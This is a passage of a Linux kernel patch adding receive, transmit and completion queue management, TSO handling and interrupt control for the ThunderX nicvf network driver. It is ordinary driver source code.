nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_DOOR, + rbdr_idx, new_rb); +next_rbdr: + /* Re-enable RBDR interrupts only if buffer allocation is success */ + if (!nic->rb_alloc_fail && rbdr->enable) + nicvf_enable_intr(nic, NICVF_INTR_RBDR, rbdr_idx); + + if (rbdr_idx) + goto refill; +} + +/* Alloc rcv buffers in non-atomic mode for better success */ +void nicvf_rbdr_work(struct work_struct *work) +{ + struct nicvf *nic = container_of(work, struct nicvf, rbdr_work.work); + + nicvf_refill_rbdr(nic, GFP_KERNEL); + if (nic->rb_alloc_fail) + schedule_delayed_work(&nic->rbdr_work, msecs_to_jiffies(10)); + else + nic->rb_work_scheduled = false; +} + +/* In Softirq context, alloc rcv buffers in atomic mode */ +void nicvf_rbdr_task(unsigned long data) +{ + struct nicvf *nic = (struct nicvf *)data; + + nicvf_refill_rbdr(nic, GFP_ATOMIC); + if (nic->rb_alloc_fail) { + nic->rb_work_scheduled = true; + schedule_delayed_work(&nic->rbdr_work, msecs_to_jiffies(10)); + } +} + +/* Initialize completion queue */ +static int nicvf_init_cmp_queue(struct nicvf *nic, + struct cmp_queue *cq, int q_len) +{ + int err; + + err = nicvf_alloc_q_desc_mem(nic, &cq->dmem, q_len, CMP_QUEUE_DESC_SIZE, + NICVF_CQ_BASE_ALIGN_BYTES); + if (err) + return err; + + cq->desc = cq->dmem.base; + cq->thresh = CMP_QUEUE_CQE_THRESH; + nic->cq_coalesce_usecs = (CMP_QUEUE_TIMER_THRESH * 0.05) - 1; + + return 0; +} + +static void nicvf_free_cmp_queue(struct nicvf *nic, struct cmp_queue *cq) +{ + if (!cq) + return; + if (!cq->dmem.base) + return; + + nicvf_free_q_desc_mem(nic, &cq->dmem); +} + +/* Initialize transmit queue */ +static int nicvf_init_snd_queue(struct nicvf *nic, + struct snd_queue *sq, int q_len) +{ + int err; + + err = nicvf_alloc_q_desc_mem(nic, &sq->dmem, q_len, SND_QUEUE_DESC_SIZE, + NICVF_SQ_BASE_ALIGN_BYTES); + if (err) + return err; + + sq->desc = sq->dmem.base; + sq->skbuff = kcalloc(q_len, sizeof(u64), GFP_ATOMIC); + sq->head = 0; + sq->tail = 0; + atomic_set(&sq->free_cnt, q_len - 1); + sq->thresh = SND_QUEUE_THRESH; + + /* Preallocate memory for TSO segment's header */ + sq->tso_hdrs = dma_alloc_coherent(&nic->pdev->dev, + q_len * TSO_HEADER_SIZE, + &sq->tso_hdrs_phys, GFP_KERNEL); + if (!sq->tso_hdrs) 
+ return -ENOMEM;
+
+ return 0;
+}
+
+static void nicvf_free_snd_queue(struct nicvf *nic, struct snd_queue *sq)
+{
+ if (!sq)
+ return;
+ if (!sq->dmem.base)
+ return;
+
+ if (sq->tso_hdrs)
+ dma_free_coherent(&nic->pdev->dev,
+ sq->dmem.q_len * TSO_HEADER_SIZE,
+ sq->tso_hdrs, sq->tso_hdrs_phys);
+
+ kfree(sq->skbuff);
+ nicvf_free_q_desc_mem(nic, &sq->dmem);
+}
+
+static void nicvf_reclaim_snd_queue(struct nicvf *nic,
+ struct queue_set *qs, int qidx)
+{
+ /* Disable send queue */
+ nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, 0);
+ /* Check if SQ is stopped */
+ if (nicvf_poll_reg(nic, qidx, NIC_QSET_SQ_0_7_STATUS, 21, 1, 0x01))
+ return;
+ /* Reset send queue */
+ nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, NICVF_SQ_RESET);
+}
+
+static void nicvf_reclaim_rcv_queue(struct nicvf *nic,
+ struct queue_set *qs, int qidx)
+{
+ union nic_mbx mbx = {};
+
+ /* Make sure all packets in the pipeline are written back into mem */
+ mbx.msg.msg = NIC_MBOX_MSG_RQ_SW_SYNC;
+ nicvf_send_msg_to_pf(nic, &mbx);
+}
+
+static void nicvf_reclaim_cmp_queue(struct nicvf *nic,
+ struct queue_set *qs, int qidx)
+{
+ /* Disable timer threshold (doesn't get reset upon CQ reset) */
+ nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG2, qidx, 0);
+ /* Disable completion queue */
+ nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, 0);
+ /* Reset completion queue */
+ nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, NICVF_CQ_RESET);
+}
+
+static void nicvf_reclaim_rbdr(struct nicvf *nic,
+ struct rbdr *rbdr, int qidx)
+{
+ u64 tmp, fifo_state;
+ int timeout = 10;
+
+ /* Save head and tail pointers for freeing up buffers */
+ rbdr->head = nicvf_queue_reg_read(nic,
+ NIC_QSET_RBDR_0_1_HEAD,
+ qidx) >> 3;
+ rbdr->tail = nicvf_queue_reg_read(nic,
+ NIC_QSET_RBDR_0_1_TAIL,
+ qidx) >> 3;
+
+ /* If RBDR FIFO is in 'FAIL' state then do a reset first
+ * before reclaiming.
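+ * (the FIFO state is reported in bits 63:62 of the RBDR STATUS0 register;
+ * a value of 0x3 means 'FAIL').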
+ */ + fifo_state = nicvf_queue_reg_read(nic, NIC_QSET_RBDR_0_1_STATUS0, qidx); + if (((fifo_state >> 62) & 0x03) == 0x3) + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, + qidx, NICVF_RBDR_RESET); + + /* Disable RBDR */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, qidx, 0); + if (nicvf_poll_reg(nic, qidx, NIC_QSET_RBDR_0_1_STATUS0, 62, 2, 0x00)) + return; + while (1) { + tmp = nicvf_queue_reg_read(nic, + NIC_QSET_RBDR_0_1_PREFETCH_STATUS, + qidx); + if ((tmp & 0xFFFFFFFF) == ((tmp >> 32) & 0xFFFFFFFF)) + break; + usleep_range(1000, 2000); + timeout--; + if (!timeout) { + netdev_err(nic->netdev, + "Failed polling on prefetch status\n"); + return; + } + } + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, + qidx, NICVF_RBDR_RESET); + + if (nicvf_poll_reg(nic, qidx, NIC_QSET_RBDR_0_1_STATUS0, 62, 2, 0x02)) + return; + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, qidx, 0x00); + if (nicvf_poll_reg(nic, qidx, NIC_QSET_RBDR_0_1_STATUS0, 62, 2, 0x00)) + return; +} + +/* Configures receive queue */ +static void nicvf_rcv_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + union nic_mbx mbx = {}; + struct rcv_queue *rq; + struct rq_cfg rq_cfg; + + rq = &qs->rq[qidx]; + rq->enable = enable; + + /* Disable receive queue */ + nicvf_queue_reg_write(nic, NIC_QSET_RQ_0_7_CFG, qidx, 0); + + if (!rq->enable) { + nicvf_reclaim_rcv_queue(nic, qs, qidx); + return; + } + + rq->cq_qs = qs->vnic_id; + rq->cq_idx = qidx; + rq->start_rbdr_qs = qs->vnic_id; + rq->start_qs_rbdr_idx = qs->rbdr_cnt - 1; + rq->cont_rbdr_qs = qs->vnic_id; + rq->cont_qs_rbdr_idx = qs->rbdr_cnt - 1; + /* all writes of RBDR data to be loaded into L2 Cache as well*/ + rq->caching = 1; + + /* Send a mailbox msg to PF to config RQ */ + mbx.rq.msg = NIC_MBOX_MSG_RQ_CFG; + mbx.rq.qs_num = qs->vnic_id; + mbx.rq.rq_num = qidx; + mbx.rq.cfg = (rq->caching << 26) | (rq->cq_qs << 19) | + (rq->cq_idx << 16) | (rq->cont_rbdr_qs << 9) | + (rq->cont_qs_rbdr_idx << 8) | + (rq->start_rbdr_qs << 1) | (rq->start_qs_rbdr_idx); + nicvf_send_msg_to_pf(nic, &mbx); + + mbx.rq.msg = NIC_MBOX_MSG_RQ_BP_CFG; + mbx.rq.cfg = (1ULL << 63) | (1ULL << 62) | (qs->vnic_id << 0); + nicvf_send_msg_to_pf(nic, &mbx); + + /* RQ drop config + * Enable CQ drop to reserve sufficient CQEs for all tx packets + */ + mbx.rq.msg = NIC_MBOX_MSG_RQ_DROP_CFG; + mbx.rq.cfg = (1ULL << 62) | (RQ_CQ_DROP << 8); + nicvf_send_msg_to_pf(nic, &mbx); + + nicvf_queue_reg_write(nic, NIC_QSET_RQ_GEN_CFG, qidx, 0x00); + + /* Enable Receive queue */ + rq_cfg.ena = 1; + rq_cfg.tcp_ena = 0; + nicvf_queue_reg_write(nic, NIC_QSET_RQ_0_7_CFG, qidx, *(u64 *)&rq_cfg); +} + +/* Configures completion queue */ +void nicvf_cmp_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + struct cmp_queue *cq; + struct cq_cfg cq_cfg; + + cq = &qs->cq[qidx]; + cq->enable = enable; + + if (!cq->enable) { + nicvf_reclaim_cmp_queue(nic, qs, qidx); + return; + } + + /* Reset completion queue */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, NICVF_CQ_RESET); + + if (!cq->enable) + return; + + spin_lock_init(&cq->lock); + /* Set completion queue base address */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_BASE, + qidx, (u64)(cq->dmem.phys_base)); + + /* Enable Completion queue */ + cq_cfg.ena = 1; + cq_cfg.reset = 0; + cq_cfg.caching = 0; + cq_cfg.qsize = CMP_QSIZE; + cq_cfg.avg_con = 0; + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG, qidx, *(u64 *)&cq_cfg); + + /* Set threshold value for interrupt generation */ + nicvf_queue_reg_write(nic, 
NIC_QSET_CQ_0_7_THRESH, qidx, cq->thresh); + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_CFG2, + qidx, nic->cq_coalesce_usecs); +} + +/* Configures transmit queue */ +static void nicvf_snd_queue_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + union nic_mbx mbx = {}; + struct snd_queue *sq; + struct sq_cfg sq_cfg; + + sq = &qs->sq[qidx]; + sq->enable = enable; + + if (!sq->enable) { + nicvf_reclaim_snd_queue(nic, qs, qidx); + return; + } + + /* Reset send queue */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, NICVF_SQ_RESET); + + sq->cq_qs = qs->vnic_id; + sq->cq_idx = qidx; + + /* Send a mailbox msg to PF to config SQ */ + mbx.sq.msg = NIC_MBOX_MSG_SQ_CFG; + mbx.sq.qs_num = qs->vnic_id; + mbx.sq.sq_num = qidx; + mbx.sq.cfg = (sq->cq_qs << 3) | sq->cq_idx; + nicvf_send_msg_to_pf(nic, &mbx); + + /* Set queue base address */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_BASE, + qidx, (u64)(sq->dmem.phys_base)); + + /* Enable send queue & set queue size */ + sq_cfg.ena = 1; + sq_cfg.reset = 0; + sq_cfg.ldwb = 0; + sq_cfg.qsize = SND_QSIZE; + sq_cfg.tstmp_bgx_intf = 0; + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, *(u64 *)&sq_cfg); + + /* Set threshold value for interrupt generation */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_THRESH, qidx, sq->thresh); + + /* Set queue:cpu affinity for better load distribution */ + if (cpu_online(qidx)) { + cpumask_set_cpu(qidx, &sq->affinity_mask); + netif_set_xps_queue(nic->netdev, + &sq->affinity_mask, qidx); + } +} + +/* Configures receive buffer descriptor ring */ +static void nicvf_rbdr_config(struct nicvf *nic, struct queue_set *qs, + int qidx, bool enable) +{ + struct rbdr *rbdr; + struct rbdr_cfg rbdr_cfg; + + rbdr = &qs->rbdr[qidx]; + nicvf_reclaim_rbdr(nic, rbdr, qidx); + if (!enable) + return; + + /* Set descriptor base address */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_BASE, + qidx, (u64)(rbdr->dmem.phys_base)); + + /* Enable RBDR & set queue size */ + /* Buffer size should be in multiples of 128 bytes */ + rbdr_cfg.ena = 1; + rbdr_cfg.reset = 0; + rbdr_cfg.ldwb = 0; + rbdr_cfg.qsize = RBDR_SIZE; + rbdr_cfg.avg_con = 0; + rbdr_cfg.lines = rbdr->dma_size / 128; + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_CFG, + qidx, *(u64 *)&rbdr_cfg); + + /* Notify HW */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_DOOR, + qidx, qs->rbdr_len - 1); + + /* Set threshold value for interrupt generation */ + nicvf_queue_reg_write(nic, NIC_QSET_RBDR_0_1_THRESH, + qidx, rbdr->thresh - 1); +} + +/* Requests PF to assign and enable Qset */ +void nicvf_qset_config(struct nicvf *nic, bool enable) +{ + union nic_mbx mbx = {}; + struct queue_set *qs = nic->qs; + struct qs_cfg *qs_cfg; + + if (!qs) { + netdev_warn(nic->netdev, + "Qset is still not allocated, don't init queues\n"); + return; + } + + qs->enable = enable; + qs->vnic_id = nic->vf_id; + + /* Send a mailbox msg to PF to config Qset */ + mbx.qs.msg = NIC_MBOX_MSG_QS_CFG; + mbx.qs.num = qs->vnic_id; + + mbx.qs.cfg = 0; + qs_cfg = (struct qs_cfg *)&mbx.qs.cfg; + if (qs->enable) { + qs_cfg->ena = 1; +#ifdef __BIG_ENDIAN + qs_cfg->be = 1; +#endif + qs_cfg->vnic = qs->vnic_id; + } + nicvf_send_msg_to_pf(nic, &mbx); +} + +static void nicvf_free_resources(struct nicvf *nic) +{ + int qidx; + struct queue_set *qs = nic->qs; + + /* Free receive buffer descriptor ring */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_free_rbdr(nic, &qs->rbdr[qidx]); + + /* Free completion queue */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_free_cmp_queue(nic, 
&qs->cq[qidx]); + + /* Free send queue */ + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_free_snd_queue(nic, &qs->sq[qidx]); +} + +static int nicvf_alloc_resources(struct nicvf *nic) +{ + int qidx; + struct queue_set *qs = nic->qs; + + /* Alloc receive buffer descriptor ring */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) { + if (nicvf_init_rbdr(nic, &qs->rbdr[qidx], qs->rbdr_len, + DMA_BUFFER_LEN)) + goto alloc_fail; + } + + /* Alloc send queue */ + for (qidx = 0; qidx < qs->sq_cnt; qidx++) { + if (nicvf_init_snd_queue(nic, &qs->sq[qidx], qs->sq_len)) + goto alloc_fail; + } + + /* Alloc completion queue */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + if (nicvf_init_cmp_queue(nic, &qs->cq[qidx], qs->cq_len)) + goto alloc_fail; + } + + return 0; +alloc_fail: + nicvf_free_resources(nic); + return -ENOMEM; +} + +int nicvf_set_qset_resources(struct nicvf *nic) +{ + struct queue_set *qs; + + qs = devm_kzalloc(&nic->pdev->dev, sizeof(*qs), GFP_KERNEL); + if (!qs) + return -ENOMEM; + nic->qs = qs; + + /* Set count of each queue */ + qs->rbdr_cnt = RBDR_CNT; + qs->rq_cnt = RCV_QUEUE_CNT; + qs->sq_cnt = SND_QUEUE_CNT; + qs->cq_cnt = CMP_QUEUE_CNT; + + /* Set queue lengths */ + qs->rbdr_len = RCV_BUF_COUNT; + qs->sq_len = SND_QUEUE_LEN; + qs->cq_len = CMP_QUEUE_LEN; + return 0; +} + +int nicvf_config_data_transfer(struct nicvf *nic, bool enable) +{ + bool disable = false; + struct queue_set *qs = nic->qs; + int qidx; + + if (!qs) + return 0; + + if (enable) { + if (nicvf_alloc_resources(nic)) + return -ENOMEM; + + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_snd_queue_config(nic, qs, qidx, enable); + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_cmp_queue_config(nic, qs, qidx, enable); + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_rbdr_config(nic, qs, qidx, enable); + for (qidx = 0; qidx < qs->rq_cnt; qidx++) + nicvf_rcv_queue_config(nic, qs, qidx, enable); + } else { + for (qidx = 0; qidx < qs->rq_cnt; qidx++) + nicvf_rcv_queue_config(nic, qs, qidx, disable); + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_rbdr_config(nic, qs, qidx, disable); + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_snd_queue_config(nic, qs, qidx, disable); + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_cmp_queue_config(nic, qs, qidx, disable); + + nicvf_free_resources(nic); + } + + return 0; +} + +/* Get a free desc from SQ + * returns descriptor ponter & descriptor number + */ +static inline int nicvf_get_sq_desc(struct snd_queue *sq, int desc_cnt) +{ + int qentry; + + qentry = sq->tail; + atomic_sub(desc_cnt, &sq->free_cnt); + sq->tail += desc_cnt; + sq->tail &= (sq->dmem.q_len - 1); + + return qentry; +} + +/* Free descriptor back to SQ for future use */ +void nicvf_put_sq_desc(struct snd_queue *sq, int desc_cnt) +{ + atomic_add(desc_cnt, &sq->free_cnt); + sq->head += desc_cnt; + sq->head &= (sq->dmem.q_len - 1); +} + +static inline int nicvf_get_nxt_sqentry(struct snd_queue *sq, int qentry) +{ + qentry++; + qentry &= (sq->dmem.q_len - 1); + return qentry; +} + +void nicvf_sq_enable(struct nicvf *nic, struct snd_queue *sq, int qidx) +{ + u64 sq_cfg; + + sq_cfg = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CFG, qidx); + sq_cfg |= NICVF_SQ_EN; + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, sq_cfg); + /* Ring doorbell so that H/W restarts processing SQEs */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_DOOR, qidx, 0); +} + +void nicvf_sq_disable(struct nicvf *nic, int qidx) +{ + u64 sq_cfg; + + sq_cfg = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_CFG, qidx); + sq_cfg &= 
~NICVF_SQ_EN; + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_CFG, qidx, sq_cfg); +} + +void nicvf_sq_free_used_descs(struct net_device *netdev, struct snd_queue *sq, + int qidx) +{ + u64 head, tail; + struct sk_buff *skb; + struct nicvf *nic = netdev_priv(netdev); + struct sq_hdr_subdesc *hdr; + + head = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_HEAD, qidx) >> 4; + tail = nicvf_queue_reg_read(nic, NIC_QSET_SQ_0_7_TAIL, qidx) >> 4; + while (sq->head != head) { + hdr = (struct sq_hdr_subdesc *)GET_SQ_DESC(sq, sq->head); + if (hdr->subdesc_type != SQ_DESC_TYPE_HEADER) { + nicvf_put_sq_desc(sq, 1); + continue; + } + skb = (struct sk_buff *)sq->skbuff[sq->head]; + atomic64_add(1, (atomic64_t *)&netdev->stats.tx_packets); + atomic64_add(hdr->tot_len, + (atomic64_t *)&netdev->stats.tx_bytes); + dev_kfree_skb_any(skb); + nicvf_put_sq_desc(sq, hdr->subdesc_cnt + 1); + } +} + +/* Calculate no of SQ subdescriptors needed to transmit all + * segments of this TSO packet. + * Taken from 'Tilera network driver' with a minor modification. + */ +static int nicvf_tso_count_subdescs(struct sk_buff *skb) +{ + struct skb_shared_info *sh = skb_shinfo(skb); + unsigned int sh_len = skb_transport_offset(skb) + tcp_hdrlen(skb); + unsigned int data_len = skb->len - sh_len; + unsigned int p_len = sh->gso_size; + long f_id = -1; /* id of the current fragment */ + long f_size = skb_headlen(skb) - sh_len; /* current fragment size */ + long f_used = 0; /* bytes used from the current fragment */ + long n; /* size of the current piece of payload */ + int num_edescs = 0; + int segment; + + for (segment = 0; segment < sh->gso_segs; segment++) { + unsigned int p_used = 0; + + /* One edesc for header and for each piece of the payload. */ + for (num_edescs++; p_used < p_len; num_edescs++) { + /* Advance as needed. */ + while (f_used >= f_size) { + f_id++; + f_size = skb_frag_size(&sh->frags[f_id]); + f_used = 0; + } + + /* Use bytes from the current fragment. */ + n = p_len - p_used; + if (n > f_size - f_used) + n = f_size - f_used; + f_used += n; + p_used += n; + } + + /* The last segment may be less than gso_size. */ + data_len -= p_len; + if (data_len < p_len) + p_len = data_len; + } + + /* '+ gso_segs' for SQ_HDR_SUDESCs for each segment */ + return num_edescs + sh->gso_segs; +} + +/* Get the number of SQ descriptors needed to xmit this skb */ +static int nicvf_sq_subdesc_required(struct nicvf *nic, struct sk_buff *skb) +{ + int subdesc_cnt = MIN_SQ_DESC_PER_PKT_XMIT; + + if (skb_shinfo(skb)->gso_size) { + subdesc_cnt = nicvf_tso_count_subdescs(skb); + return subdesc_cnt; + } + + if (skb_shinfo(skb)->nr_frags) + subdesc_cnt += skb_shinfo(skb)->nr_frags; + + return subdesc_cnt; +} + +/* Add SQ HEADER subdescriptor. + * First subdescriptor for every send descriptor. 
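+ * Carries the total packet length, the number of subdescriptors that
+ * follow and, for CHECKSUM_PARTIAL skbs, the L3/L4 checksum offload flags.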
+ */ +static inline void +nicvf_sq_add_hdr_subdesc(struct snd_queue *sq, int qentry, + int subdesc_cnt, struct sk_buff *skb, int len) +{ + int proto; + struct sq_hdr_subdesc *hdr; + + hdr = (struct sq_hdr_subdesc *)GET_SQ_DESC(sq, qentry); + sq->skbuff[qentry] = (u64)skb; + + memset(hdr, 0, SND_QUEUE_DESC_SIZE); + hdr->subdesc_type = SQ_DESC_TYPE_HEADER; + /* Enable notification via CQE after processing SQE */ + hdr->post_cqe = 1; + /* No of subdescriptors following this */ + hdr->subdesc_cnt = subdesc_cnt; + hdr->tot_len = len; + + /* Offload checksum calculation to HW */ + if (skb->ip_summed == CHECKSUM_PARTIAL) { + if (skb->protocol != htons(ETH_P_IP)) + return; + + hdr->csum_l3 = 1; /* Enable IP csum calculation */ + hdr->l3_offset = skb_network_offset(skb); + hdr->l4_offset = skb_transport_offset(skb); + + proto = ip_hdr(skb)->protocol; + switch (proto) { + case IPPROTO_TCP: + hdr->csum_l4 = SEND_L4_CSUM_TCP; + break; + case IPPROTO_UDP: + hdr->csum_l4 = SEND_L4_CSUM_UDP; + break; + case IPPROTO_SCTP: + hdr->csum_l4 = SEND_L4_CSUM_SCTP; + break; + } + } +} + +/* SQ GATHER subdescriptor + * Must follow HDR descriptor + */ +static inline void nicvf_sq_add_gather_subdesc(struct snd_queue *sq, int qentry, + int size, u64 data) +{ + struct sq_gather_subdesc *gather; + + qentry &= (sq->dmem.q_len - 1); + gather = (struct sq_gather_subdesc *)GET_SQ_DESC(sq, qentry); + + memset(gather, 0, SND_QUEUE_DESC_SIZE); + gather->subdesc_type = SQ_DESC_TYPE_GATHER; + gather->ld_type = NIC_SEND_LD_TYPE_E_LDWB; + gather->size = size; + gather->addr = data; +} + +/* Segment a TSO packet into 'gso_size' segments and append + * them to SQ for transfer + */ +static int nicvf_sq_append_tso(struct nicvf *nic, struct snd_queue *sq, + int qentry, struct sk_buff *skb) +{ + struct tso_t tso; + int seg_subdescs = 0, desc_cnt = 0; + int seg_len, total_len, data_left; + int hdr_qentry = qentry; + int hdr_len = skb_transport_offset(skb) + tcp_hdrlen(skb); + + tso_start(skb, &tso); + total_len = skb->len - hdr_len; + while (total_len > 0) { + char *hdr; + + /* Save Qentry for adding HDR_SUBDESC at the end */ + hdr_qentry = qentry; + + data_left = min_t(int, skb_shinfo(skb)->gso_size, total_len); + total_len -= data_left; + + /* Add segment's header */ + qentry = nicvf_get_nxt_sqentry(sq, qentry); + hdr = sq->tso_hdrs + qentry * TSO_HEADER_SIZE; + tso_build_hdr(skb, hdr, &tso, data_left, total_len == 0); + nicvf_sq_add_gather_subdesc(sq, qentry, hdr_len, + sq->tso_hdrs_phys + + qentry * TSO_HEADER_SIZE); + /* HDR_SUDESC + GATHER */ + seg_subdescs = 2; + seg_len = hdr_len; + + /* Add segment's payload fragments */ + while (data_left > 0) { + int size; + + size = min_t(int, tso.size, data_left); + + qentry = nicvf_get_nxt_sqentry(sq, qentry); + nicvf_sq_add_gather_subdesc(sq, qentry, size, + virt_to_phys(tso.data)); + seg_subdescs++; + seg_len += size; + + data_left -= size; + tso_build_data(skb, &tso, size); + } + nicvf_sq_add_hdr_subdesc(sq, hdr_qentry, + seg_subdescs - 1, skb, seg_len); + sq->skbuff[hdr_qentry] = 0; + qentry = nicvf_get_nxt_sqentry(sq, qentry); + + desc_cnt += seg_subdescs; + } + /* Save SKB in the last segment for freeing */ + sq->skbuff[hdr_qentry] = (u64)skb; + + /* make sure all memory stores are done before ringing doorbell */ + smp_wmb(); + + /* Inform HW to xmit all TSO segments */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_DOOR, + skb_get_queue_mapping(skb), desc_cnt); + return 1; +} + +/* Append an skb to a SQ for packet transfer. 
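+ * Returns 1 on success, 0 if there aren't enough free SQ descriptors;
+ * in that case the caller stops the corresponding tx queue.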
*/ +int nicvf_sq_append_skb(struct nicvf *nic, struct sk_buff *skb) +{ + int i, size; + int subdesc_cnt; + int sq_num, qentry; + struct queue_set *qs = nic->qs; + struct snd_queue *sq; + + sq_num = skb_get_queue_mapping(skb); + sq = &qs->sq[sq_num]; + + subdesc_cnt = nicvf_sq_subdesc_required(nic, skb); + if (subdesc_cnt > atomic_read(&sq->free_cnt)) + goto append_fail; + + qentry = nicvf_get_sq_desc(sq, subdesc_cnt); + + /* Check if its a TSO packet */ + if (skb_shinfo(skb)->gso_size) + return nicvf_sq_append_tso(nic, sq, qentry, skb); + + /* Add SQ header subdesc */ + nicvf_sq_add_hdr_subdesc(sq, qentry, subdesc_cnt - 1, skb, skb->len); + + /* Add SQ gather subdescs */ + qentry = nicvf_get_nxt_sqentry(sq, qentry); + size = skb_is_nonlinear(skb) ? skb_headlen(skb) : skb->len; + nicvf_sq_add_gather_subdesc(sq, qentry, size, virt_to_phys(skb->data)); + + /* Check for scattered buffer */ + if (!skb_is_nonlinear(skb)) + goto doorbell; + + for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) { + const struct skb_frag_struct *frag; + + frag = &skb_shinfo(skb)->frags[i]; + + qentry = nicvf_get_nxt_sqentry(sq, qentry); + size = skb_frag_size(frag); + nicvf_sq_add_gather_subdesc(sq, qentry, size, + virt_to_phys( + skb_frag_address(frag))); + } + +doorbell: + /* make sure all memory stores are done before ringing doorbell */ + smp_wmb(); + + /* Inform HW to xmit new packet */ + nicvf_queue_reg_write(nic, NIC_QSET_SQ_0_7_DOOR, + sq_num, subdesc_cnt); + return 1; + +append_fail: + netdev_dbg(nic->netdev, "Not enough SQ descriptors to xmit pkt\n"); + return 0; +} + +static inline unsigned frag_num(unsigned i) +{ +#ifdef __BIG_ENDIAN + return (i & ~3) + 3 - (i & 3); +#else + return i; +#endif +} + +/* Returns SKB for a received packet */ +struct sk_buff *nicvf_get_rcv_skb(struct nicvf *nic, struct cqe_rx_t *cqe_rx) +{ + int frag; + int payload_len = 0; + struct sk_buff *skb = NULL; + struct sk_buff *skb_frag = NULL; + struct sk_buff *prev_frag = NULL; + u16 *rb_lens = NULL; + u64 *rb_ptrs = NULL; + + rb_lens = (void *)cqe_rx + (3 * sizeof(u64)); + rb_ptrs = (void *)cqe_rx + (6 * sizeof(u64)); + + netdev_dbg(nic->netdev, "%s rb_cnt %d rb0_ptr %llx rb0_sz %d\n", + __func__, cqe_rx->rb_cnt, cqe_rx->rb0_ptr, cqe_rx->rb0_sz); + + for (frag = 0; frag < cqe_rx->rb_cnt; frag++) { + payload_len = rb_lens[frag_num(frag)]; + if (!frag) { + /* First fragment */ + skb = nicvf_rb_ptr_to_skb(nic, + *rb_ptrs - cqe_rx->align_pad, + payload_len); + if (!skb) + return NULL; + skb_reserve(skb, cqe_rx->align_pad); + skb_put(skb, payload_len); + } else { + /* Add fragments */ + skb_frag = nicvf_rb_ptr_to_skb(nic, *rb_ptrs, + payload_len); + if (!skb_frag) { + dev_kfree_skb(skb); + return NULL; + } + + if (!skb_shinfo(skb)->frag_list) + skb_shinfo(skb)->frag_list = skb_frag; + else + prev_frag->next = skb_frag; + + prev_frag = skb_frag; + skb->len += payload_len; + skb->data_len += payload_len; + skb_frag->len = payload_len; + } + /* Next buffer pointer */ + rb_ptrs++; + } + return skb; +} + +/* Enable interrupt */ +void nicvf_enable_intr(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val; + + reg_val = nicvf_reg_read(nic, NIC_VF_ENA_W1S); + + switch (int_type) { + case NICVF_INTR_CQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + reg_val |= (1ULL << NICVF_INTR_PKT_DROP_SHIFT); + break; + case 
NICVF_INTR_TCP_TIMER: + reg_val |= (1ULL << NICVF_INTR_TCP_TIMER_SHIFT); + break; + case NICVF_INTR_MBOX: + reg_val |= (1ULL << NICVF_INTR_MBOX_SHIFT); + break; + case NICVF_INTR_QS_ERR: + reg_val |= (1ULL << NICVF_INTR_QS_ERR_SHIFT); + break; + default: + netdev_err(nic->netdev, + "Failed to enable interrupt: unknown type\n"); + break; + } + + nicvf_reg_write(nic, NIC_VF_ENA_W1S, reg_val); +} + +/* Disable interrupt */ +void nicvf_disable_intr(struct nicvf *nic, int int_type, int q_idx) +{ + u64 reg_val = 0; + + switch (int_type) { + case NICVF_INTR_CQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_CQ_SHIFT); + break; + case NICVF_INTR_SQ: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_SQ_SHIFT); + break; + case NICVF_INTR_RBDR: + reg_val |= ((1ULL << q_idx) << NICVF_INTR_RBDR_SHIFT); + break; + case NICVF_INTR_PKT_DROP: + 